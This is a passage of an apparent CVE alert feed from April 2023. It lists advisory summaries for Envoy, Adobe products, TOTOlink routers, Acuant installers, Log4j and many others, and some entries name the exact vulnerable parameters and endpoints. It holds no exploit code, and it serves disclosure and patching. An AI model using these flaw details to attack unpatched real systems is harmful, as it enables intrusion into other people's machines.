iptables rules that prevent encrypted overlay networks from accepting unencrypted packets are not created until a peer is available with which to communicate. Encrypted overlay networks silently accept cleartext VXLAN datagrams that are tagged with the VNI of an encrypted overlay network. As a result, it is possible to inject arbitrary Ethernet frames into the encrypted overlay network by encapsulating them in VXLAN datagrams. The implications of this can be quite dire, and GHSA-vwm3-crmr-xfxw should be referenced for a deeper exploration. Patches are available in Moby releases 23.0.3, and 20.10.24. As Mirantis Container Runtime's 20.10 releases are numbered differently, users of that platform should update to 20.10.16. Some workarounds are available. In multi-node clusters, deploy a global ‘pause’ container for each encrypted overlay network, on every node. For a single-node cluster, do not use overlay networks of any sort. Bridge networks provide the same connectivity on a single node and have no multi-node features. The Swarm ingress feature is implemented using an overlay network, but can be disabled by publishing ports in `host` mode instead of `ingress` mode (allowing the use of an external load balancer), and removing the `ingress` network. If encrypted overlay networks are in exclusive use, block UDP port 4789 from traffic that has not been validated by IPSec.🎖@cveNotify |
|
| 2023-04-04 20:58:31 |
🚨 CVE-2023-1666A vulnerability has been found in SourceCodester Automatic Question Paper Generator System 1.0 and classified as critical. This vulnerability affects unknown code of the file users/classes/view_class.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224104.🎖@cveNotify |
|
| 2023-04-04 20:58:30 |
🚨 CVE-2023-22249Adobe Commerce versions 2.4.4-p2 (and earlier) and 2.4.5-p1 (and earlier) are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2023-04-04 20:58:29 |
🚨 CVE-2023-22250Adobe Commerce versions 2.4.4-p2 (and earlier) and 2.4.5-p1 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the availability of a user's minor feature. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-04-04 20:58:25 |
🚨 CVE-2023-22251Adobe Commerce versions 2.4.4-p2 (and earlier) and 2.4.5-p1 (and earlier) are affected by an Incorrect Authorization vulnerability. A low-privileged authenticated attacker could leverage this vulnerability to achieve minor information disclosure.🎖@cveNotify |
|
| 2023-04-04 20:58:24 |
🚨 CVE-2023-27229TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the upBw parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-04-04 20:58:23 |
🚨 CVE-2023-27231TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the downBw parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-04-04 20:58:22 |
🚨 CVE-2023-27232TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wanStrategy parameter at /setting/setWanIeCfg.🎖@cveNotify |
|
| 2023-04-04 20:58:21 |
🚨 CVE-2023-1681A vulnerability, which was classified as problematic, was found in Xunrui CMS 4.61. Affected is an unknown function of the file /config/myfield/test.php. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-224238 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-04 20:58:17 |
🚨 CVE-2023-27491Envoy is an open source edge and service proxy designed for cloud-native applications. Compliant HTTP/1 service should reject malformed request lines. Prior to versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, There is a possibility that non compliant HTTP/1 service may allow malformed requests, potentially leading to a bypass of security policies. This issue is fixed in versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9.🎖@cveNotify |
|
| 2023-04-04 20:58:16 |
🚨 CVE-2023-27492Envoy is an open source edge and service proxy designed for cloud-native applications. Prior to versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, the Lua filter is vulnerable to denial of service. Attackers can send large request bodies for routes that have Lua filter enabled and trigger crashes. As of versions versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, Envoy no longer invokes the Lua coroutine if the filter has been reset. As a workaround for those whose Lua filter is buffering all requests/ responses, mitigate by using the buffer filter to avoid triggering the local reply in the Lua filter.🎖@cveNotify |
|
| 2023-04-04 20:58:15 |
🚨 CVE-2023-27089Cross Site Scripting vulnerability found in Ehuacui BBS allows attackers to cause a denial of service via a crafted payload in the login parameter.🎖@cveNotify |
|
| 2023-04-04 20:58:14 |
🚨 CVE-2023-27091An unauthorized access issue found in XiaoBingby TeaCMS 2.3.3 allows attackers to escalate privileges via the id and keywords parameter(s).🎖@cveNotify |
|
| 2023-04-04 20:58:13 |
🚨 CVE-2023-27488Envoy is an open source edge and service proxy designed for cloud-native applications. Prior to versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, escalation of privileges is possible when `failure_mode_allow: true` is configured for `ext_authz` filter. For affected components that are used for logging and/or visibility, requests may not be logged by the receiving service. When Envoy was configured to use ext_authz, ext_proc, tap, ratelimit filters, and grpc access log service and an http header with non-UTF-8 data was received, Envoy would generate an invalid protobuf message and send it to the configured service. The receiving service would typically generate an error when decoding the protobuf message. For ext_authz that was configured with ``failure_mode_allow: true``, the request would have been allowed in this case. For the other services, this could have resulted in other unforeseen errors such as a lack of visibility into requests. As of versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, Envoy by default sanitizes the values sent in gRPC service calls to be valid UTF-8, replacing data that is not valid UTF-8 with a `!` character. This behavioral change can be temporarily reverted by setting runtime guard `envoy.reloadable_features.service_sanitize_non_utf8_strings` to false. As a workaround, one may set `failure_mode_allow: false` for `ext_authz`.🎖@cveNotify |
|
| 2023-04-04 19:58:23 |
🚨 CVE-2022-48224An issue was discovered in Acuant AcuFill SDK before 10.22.02.03. It is installed with insecure permissions (full write access within Program Files). Standard users can replace files within this directory that get executed with elevated privileges, leading to a complete arbitrary code execution (elevation of privileges).🎖@cveNotify |
|
| 2023-04-04 19:58:19 |
🚨 CVE-2022-48227An issue was discovered in Acuant AsureID Sentinel before 5.2.149. It allows elevation of privileges because it opens Notepad after the installation of AssureID, Identify x64, and Identify x86, aka CORE-7361.🎖@cveNotify |
|
| 2023-04-04 19:58:18 |
🚨 CVE-2023-27487Envoy is an open source edge and service proxy designed for cloud-native applications. Prior to versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9, the client may bypass JSON Web Token (JWT) checks and forge fake original paths. The header `x-envoy-original-path` should be an internal header, but Envoy does not remove this header from the request at the beginning of request processing when it is sent from an untrusted client. The faked header would then be used for trace logs and grpc logs, as well as used in the URL used for `jwt_authn` checks if the `jwt_authn` filter is used, and any other upstream use of the x-envoy-original-path header. Attackers may forge a trusted `x-envoy-original-path` header. Versions 1.26.0, 1.25.3, 1.24.4, 1.23.6, and 1.22.9 have patches for this issue.🎖@cveNotify |
|
| 2023-04-04 19:58:17 |
🚨 CVE-2023-1748The listed versions of Nexx Smart Home devices use hard-coded credentials. An attacker with unauthenticated access to the Nexx Home mobile application or the affected firmware could view the credentials and access the MQ Telemetry Server (MQTT) server and the ability to remotely control garage doors or smart plugs for any customer.🎖@cveNotify |
|
| 2023-04-04 19:58:13 |
🚨 CVE-2023-1750The listed versions of Nexx Smart Home devices lack proper access control when executing actions. An attacker with a valid NexxHome deviceId could retrieve device history, set device settings, and retrieve device information.🎖@cveNotify |
|
| 2023-04-04 19:58:12 |
🚨 CVE-2023-1752The listed versions of Nexx Smart Home devices could allow any user to register an already registered alarm or associated device with only the device’s MAC address.🎖@cveNotify |
|
| 2023-04-04 19:58:11 |
🚨 CVE-2022-48435In JetBrains PhpStorm before 2023.1 source code could be logged in the local idea.log file🎖@cveNotify |
|
| 2023-04-04 17:58:42 |
🚨 CVE-2020-23258An issue found in Jsish v.3.0.11 allows a remote attacker to cause a denial of service via the Jsi_ValueIsNumber function in ./src/jsiValue.c file.🎖@cveNotify |
|
| 2023-04-04 17:58:41 |
🚨 CVE-2020-23260An issue found in Jsish v.3.0.11 and before allows an attacker to cause a denial of service via the StringReplaceCmd function in the src/jsiChar.c file.🎖@cveNotify |
|
| 2023-04-04 17:58:40 |
🚨 CVE-2020-29312An issue found in Zend Framework v.3.1.3 and before allow a remote attacker to execute arbitrary code via the unserialize function.🎖@cveNotify |
|
| 2023-04-04 17:58:39 |
🚨 CVE-2021-28235Authentication vulnerability found in Etcd-io v.3.4.10 allows remote attackers to escalate privileges via the debug function.🎖@cveNotify |
|
| 2023-04-04 17:58:36 |
🚨 CVE-2021-31707Permissions vulnerability found in KiteCMS allows a remote attacker to execute arbitrary code via the upload file type.🎖@cveNotify |
|
| 2023-04-04 17:58:35 |
🚨 CVE-2022-48221An issue was discovered in Acuant AcuFill SDK before 10.22.02.03. Multiple MSI's get executed out of a standard-user writable directory. Through a race condition and OpLock manipulation, these files can be overwritten by a standard user. They then get executed by the elevated installer. This gives a standard user full SYSTEM code execution (elevation of privileges).🎖@cveNotify |
|
| 2023-04-04 17:58:34 |
🚨 CVE-2022-48225An issue was discovered in Acuant AcuFill SDK before 10.22.02.03. It is used to install drivers from several different vendors. The Gemalto Document Reader child installation process is vulnerable to DLL hijacking, because it attempts to execute (with elevated privileges) multiple non-existent DLLs out of a non-existent standard-user writable location.🎖@cveNotify |
|
| 2023-04-04 17:58:33 |
🚨 CVE-2022-48226An issue was discovered in Acuant AcuFill SDK before 10.22.02.03. During installation, an EXE gets executed out of C:\Windows\Temp. A standard user can create the path file ahead of time and obtain elevated code execution. Permissions need to be modified to prevent manipulation.🎖@cveNotify |
|
| 2023-04-04 17:58:30 |
🚨 CVE-2022-48228An issue was discovered in Acuant AsureID Sentinel before 5.2.149. It uses the root of the C: drive for the i-Dentify and Sentinel Installer log files, aka CORE-7362.🎖@cveNotify |
|
| 2023-04-04 17:58:29 |
🚨 CVE-2023-26733Buffer Overflow vulnerability found in tinyTIFF v.3.0 allows a local attacker to cause a denial of service via the TinyTiffReader_readNextFrame function in tinytiffreader.c file.🎖@cveNotify |
|
| 2023-04-04 17:58:28 |
🚨 CVE-2020-19692Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.🎖@cveNotify |
|
| 2023-04-04 17:58:24 |
🚨 CVE-2023-26775File Upload vulnerability found in Monitorr v.1.7.6 allows a remote attacker t oexecute arbitrary code via a crafted file upload to the assets/php/upload.php endpoint.🎖@cveNotify |
|
| 2023-04-04 17:58:23 |
🚨 CVE-2023-26776Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.🎖@cveNotify |
|
| 2023-04-04 17:58:22 |
🚨 CVE-2020-19693An issue found in Espruino Espruino 6ea4c0a allows an attacker to execute arbitrrary code via oldFunc parameter of the jswrap_object.c:jswrap_function_replacewith endpoint.🎖@cveNotify |
|
| 2023-04-04 12:58:21 |
🚨 CVE-2023-25940Dell PowerScale OneFS version 9.5.0.0 contains improper link resolution before file access vulnerability in isi_gather_info. A low privilege local attacker could potentially exploit this vulnerability, leading to system takeover and it breaks the compliance mode guarantees.🎖@cveNotify |
|
| 2023-04-04 12:58:20 |
🚨 CVE-2023-25942Dell PowerScale OneFS versions 8.2.x-9.4.x contain an uncontrolled resource consumption vulnerability. A malicious network user with low privileges could potentially exploit this vulnerability in SMB, leading to a potential denial of service.🎖@cveNotify |
|
| 2023-04-04 12:58:16 |
🚨 CVE-2022-0900A Stored Cross-Site Scripting (XSS) vulnerability in DivvyDrive's "aciklama" parameter could allow anyone to gain users' session informations.🎖@cveNotify |
|
| 2023-04-04 12:58:15 |
🚨 CVE-2020-36692A reflected XSS via POST vulnerability in report scheduler of Sophos Web Appliance versions older than 4.3.10.4 allows execution of JavaScript code in the victim browser via a malicious form that must be manually submitted by the victim while logged in to SWA.🎖@cveNotify |
|
| 2023-04-04 12:58:14 |
🚨 CVE-2022-4934A post-auth command injection vulnerability in the exception wizard of Sophos Web Appliance older than version 4.3.10.4 allows administrators to execute arbitrary code.🎖@cveNotify |
|
| 2023-04-04 12:58:13 |
🚨 CVE-2023-1827A vulnerability has been found in SourceCodester Centralized Covid Vaccination Records System 1.0 and classified as critical. This vulnerability affects unknown code of the file /vaccinated/admin/maintenance/manage_location.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-224842 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-04 06:58:28 |
🚨 CVE-2023-26855The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.🎖@cveNotify |
|
| 2023-04-04 06:58:24 |
🚨 CVE-2023-26976Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.🎖@cveNotify |
|
| 2023-04-04 06:58:23 |
🚨 CVE-2023-27781jpegoptim v1.5.2 was discovered to contain a heap overflow in the optimize function at jpegoptim.c.🎖@cveNotify |
|
| 2023-04-04 06:58:22 |
🚨 CVE-2023-1516RoboDK versions 5.5.3 and prior contain an insecure permission assignment to critical directories vulnerability, which could allow a local user to escalate privileges and write files to the RoboDK process and achieve code execution.🎖@cveNotify |
|
| 2023-04-04 06:58:21 |
🚨 CVE-2023-0775An invalid ‘prepare write request’ command can cause the Bluetooth LE stack to run out of memory and fail to be able to handle subsequent connection requests, resulting in a denial-of-service.🎖@cveNotify |
|
| 2023-04-04 06:58:17 |
🚨 CVE-2023-25260Stimulsoft Designer (Web) 2023.1.3 is vulnerable to Local File Inclusion.🎖@cveNotify |
|
| 2023-04-04 06:58:16 |
🚨 CVE-2022-48291The Bluetooth module has an authentication bypass vulnerability in the pairing process. Successful exploitation of this vulnerability may affect confidentiality.🎖@cveNotify |
|
| 2023-04-04 06:58:15 |
🚨 CVE-2022-2237A flaw was found in the Keycloak Node.js Adapter. This flaw allows an attacker to benefit from an Open Redirect vulnerability in the checkSso function.🎖@cveNotify |
|
| 2023-04-04 00:58:23 |
🚨 CVE-2023-0225A flaw was found in Samba. An incomplete access check on dnsHostName allows authenticated but otherwise unprivileged users to delete this attribute from any object in the directory.🎖@cveNotify |
|
| 2023-04-04 00:58:22 |
🚨 CVE-2023-0614The fix in 4.6.16, 4.7.9, 4.8.4 and 4.9.7 for CVE-2018-10919 Confidential attribute disclosure vi LDAP filters was insufficient and an attacker may be able to obtain confidential BitLocker recovery keys from a Samba AD DC.🎖@cveNotify |
|
| 2023-04-04 00:58:18 |
🚨 CVE-2023-1579Heap based buffer overflow in binutils-gdb/bfd/libbfd.c in bfd_getl64.🎖@cveNotify |
|
| 2023-04-04 00:58:17 |
🚨 CVE-2023-1611A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel.This flaw allows an attacker to crash the system and possibly cause a kernel information lea🎖@cveNotify |
|
| 2023-04-04 00:58:16 |
🚨 CVE-2023-26916libyang from v2.0.164 to v2.1.30 was discovered to contain a NULL pointer dereference via the function lys_parse_mem at lys_parse_mem.c.🎖@cveNotify |
|
| 2023-04-03 22:29:49 |
🚨 CVE-2022-2884A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an an authenticated user to achieve remote code execution via the Import from GitHub API endpoint🎖@cveNotify |
|
| 2023-04-03 22:29:48 |
🚨 CVE-2022-31161Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.🎖@cveNotify |
|
| 2023-04-03 22:29:47 |
🚨 CVE-2022-31137Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Versions prior to 6.1.1.0 are subject to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Attackers need not be authenticated to exploit this vulnerability. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-03 22:29:46 |
🚨 CVE-2022-31125Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to bypass authentication and access admin functionality by sending a specially crafted HTTP request. This affects Roxywi versions before 6.1.1.0. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-03 22:29:45 |
🚨 CVE-2021-43116An Access Control vulnerability exists in Nacos 2.0.3 in the access prompt page; enter username and password, click on login to capture packets and then change the returned package, which lets a malicious user login.🎖@cveNotify |
|
| 2023-04-03 22:29:41 |
🚨 CVE-2022-31056GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. In affected versions all assistance forms (Ticket/Change/Problem) permit sql injection on the actor fields. This issue has been resolved in version 10.0.2 and all affected users are advised to upgrade.🎖@cveNotify |
|
| 2023-04-03 22:29:40 |
🚨 CVE-2022-31062### Impact A plugin public script can be used to read content of system files. ### Patches Upgrade to version 1.0.2. ### Workarounds `b/deploy/index.php` file can be deleted if deploy feature is not used.🎖@cveNotify |
|
| 2023-04-03 22:29:39 |
🚨 CVE-2021-44228Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.🎖@cveNotify |
|
| 2023-04-03 22:29:38 |
🚨 CVE-2020-25213The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.🎖@cveNotify |
|
| 2023-04-03 21:30:00 |
🚨 CVE-2022-4769Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the target path on host when a file is uploaded with an invalid character in its name.🎖@cveNotify |
|
| 2023-04-03 21:29:59 |
🚨 CVE-2022-4770Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.0 and 9.3.0.2, including 8.3.x display the full parametrized SQL query in an error message when an invalid character is used within a Pentaho Report (*.prpt).🎖@cveNotify |
|
| 2023-04-03 21:29:58 |
🚨 CVE-2023-1074A memory leak flaw was found in the Linux kernel's Stream Control Transmission Protocol. This issue may occur when a user starts a malicious networking service and someone connects to this service. This could allow a local user to starve resources, causing a denial of service.🎖@cveNotify |
|
| 2023-04-03 21:29:57 |
🚨 CVE-2023-26328Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:53 |
🚨 CVE-2023-26329Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:52 |
🚨 CVE-2023-26330Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:51 |
🚨 CVE-2022-45589All versions before 8.0.1-R2022-10-RT and 7.3.1-R2022-09-RT of the Talend ESB Runtime are potentially vulnerable to SQL Injection attacks in the provisioning service only. Users of the provisioning service should upgrade to either 8.0.1-R2022-10-RT or 7.3.1-R2022-09-RT or a later release and use it in place of the previous version.🎖@cveNotify |
|
| 2023-04-03 21:29:50 |
🚨 CVE-2023-26331Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:46 |
🚨 CVE-2023-26332Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:45 |
🚨 CVE-2023-26333Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:43 |
🚨 CVE-2022-24673This vulnerability allows remote attackers to execute arbitrary code on affected installations of Canon imageCLASS MF644Cdw 10.02 printers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the SLP protocol. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15845.🎖@cveNotify |
|
| 2023-04-03 21:29:42 |
🚨 CVE-2023-1077In the Linux kernel, pick_next_rt_entity() may return a type confused entry, not detected by the BUG_ON condition, as the confused entry will not be NULL, but list_head.The buggy error condition would lead to a type confused entry with the list head,which would then be used as a type confused sched_rt_entity,causing memory corruption.🎖@cveNotify |
|
| 2023-04-03 21:29:38 |
🚨 CVE-2023-25899Adobe Dimension versions 3.4.7 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:37 |
🚨 CVE-2023-25904Adobe Dimension versions 3.4.7 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 21:29:36 |
🚨 CVE-2023-25901Adobe Dimension versions 3.4.7 (and earlier) is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 19:29:49 |
🚨 CVE-2023-27701MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /database/sqldel.html.🎖@cveNotify |
|
| 2023-04-03 19:29:48 |
🚨 CVE-2023-26923Musescore 3.0 to 4.0.1 has a stack buffer overflow vulnerability that occurs when reading misconfigured midi files. If attacker can additional information, attacker can execute arbitrary code.🎖@cveNotify |
|
| 2023-04-03 19:29:47 |
🚨 CVE-2023-28596Zoom Client for IT Admin macOS installers before version 5.13.5 contain a local privilege escalation vulnerability. A local low-privileged user could exploit this vulnerability in an attack chain during the installation process to escalate their privileges to privileges to root.🎖@cveNotify |
|
| 2023-04-03 19:29:44 |
🚨 CVE-2022-36440A reachable assertion was found in Frrouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP open packets and send them to BGP peers running frr-bgpd, resulting in DoS.🎖@cveNotify |
|
| 2023-04-03 19:29:43 |
🚨 CVE-2022-38072An improper array index validation vulnerability exists in the stl_fix_normal_directions functionality of ADMesh Master Commit 767a105 and v0.98.4. A specially-crafted stl file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-03 19:29:42 |
🚨 CVE-2023-0975A vulnerability exists in Trellix Agent for Windows version 5.7.8 and earlier, that allows local users, during install/upgrade workflow, to replace one of the Agent’s executables before it can be executed. This allows the user to elevate their permissions.🎖@cveNotify |
|
| 2023-04-03 19:29:41 |
🚨 CVE-2023-28834Nextcloud Server is an open source personal cloud server. Nextcloud Server 24.0.0 until 24.0.6 and 25.0.0 until 25.0.4, as well as Nextcloud Enterprise Server 23.0.0 until 23.0.11, 24.0.0 until 24.0.6, and 25.0.0 until 25.0.4, have an information disclosure vulnerability. A user was able to get the full data directory path of the Nextcloud server from an API endpoint. By itself this information is not problematic as it can also be guessed for most common setups, but it could speed up other unknown attacks in the future if the information is known. Nextcloud Server 24.0.6 and 25.0.4 and Nextcloud Enterprise Server 23.0.11, 24.0.6, and 25.0.4 contain patches for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-04-03 17:29:47 |
🚨 CVE-2023-26269Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a malicious local user. Administrators are advised to disable JMX, or set up a JMX password. Note that version 3.7.4 onward will set up a JMX password automatically for Guice users.🎖@cveNotify |
|
| 2023-04-03 17:29:43 |
🚨 CVE-2023-1626A vulnerability was found in Jianming Antivirus 16.2.2022.418. It has been declared as critical. This vulnerability affects unknown code in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to memory corruption. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-224008.🎖@cveNotify |
|
| 2023-04-03 17:29:42 |
🚨 CVE-2023-24835Softnext Technologies Corp.’s SPAM SQR has a vulnerability of Code Injection within its specific function. An authenticated remote attacker with administrator privilege can exploit this vulnerability to execute arbitrary system command to perform arbitrary system operation or disrupt service.🎖@cveNotify |
|
| 2023-04-03 17:29:41 |
🚨 CVE-2023-28867In GraphQL Java (aka graphql-java) before 20.1, an attacker can send a crafted GraphQL query that causes stack consumption. The fixed versions are 20.1, 19.4, 18.4, 17.5, and 0.0.0-2023-03-20T01-49-44-80e3135.🎖@cveNotify |
|
| 2023-04-03 10:29:39 |
🚨 CVE-2023-26269Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a malicious local user. Administrators are advised to disable JMX, or set up a JMX password. Note that version 3.7.4 onward will set up a JMX password automatically for Guice users.🎖@cveNotify |
|
| 2023-04-03 10:29:38 |
🚨 CVE-2022-3685A vulnerability exists in the SDM600 software. The software operates at a privilege level that is higher than the minimum level required. An attacker who successfully exploits this vulnerability can escalate privileges. This issue affects: All SDM600 versions prior to version 1.3.0. List of CPEs: * cpe:2.3:a:hitachienergy:sdm600:1.0:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.1:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.9002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.10002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.11002.149:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.12002.222:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.13002.72:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.44:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.92:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.108:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.182:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.257:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.342:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.447:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.481:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.506:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.14002.566:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.20000.3174:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.291:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.931:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.21000.105:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.2.23000.291:*:*:*:*:*:*:* * cpe:2.3:a:hitachienergy:sdm600:1.3.0.1339:*:*:*:*:*:*:*🎖@cveNotify |
|
| 2023-04-03 10:29:36 |
🚨 CVE-2023-26119Versions of the package net.sourceforge.htmlunit:htmlunit from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.🎖@cveNotify |
|
| 2023-04-03 06:29:53 |
🚨 CVE-2023-25870Adobe Substance 3D Stager versions 2.0.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:52 |
🚨 CVE-2023-25866Adobe Substance 3D Stager versions 2.0.0 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-03 06:29:48 |
